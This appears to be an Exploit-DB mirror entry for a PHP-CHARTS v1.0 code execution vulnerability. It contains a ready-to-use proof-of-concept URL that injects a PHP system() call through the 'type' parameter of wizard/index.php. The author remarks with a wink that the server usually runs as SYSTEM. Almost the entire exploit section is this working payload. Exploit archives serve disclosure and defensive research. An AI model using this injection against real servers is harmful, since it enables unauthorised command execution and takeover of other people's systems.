exploit-db-mirror/exploits/php/webapps/25496.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

18 lines
No EOL
525 B
Text

# Exploit Title: PHP-CHARTS v1.0 code execution vulnerability
# Date: 05/15/2013
# Exploit Author: fizzle stick
# Vendor Homepage: http://php-charts.com/
# Software Link: http://php-charts.com/downloads/php-chart_v1.0.zip
# Version: v1.0
# Tested on: Windows
Summary: PHP-charts v1.0 suffers from a code execution vulerability in the
index.php page
Exploit:
http://192.168.1.120/phpcharts/wizard/index.php?type=';system('whoami');//
Result: If vulnerable the web service context will be displayed, usually
SYSTEM. ;D
####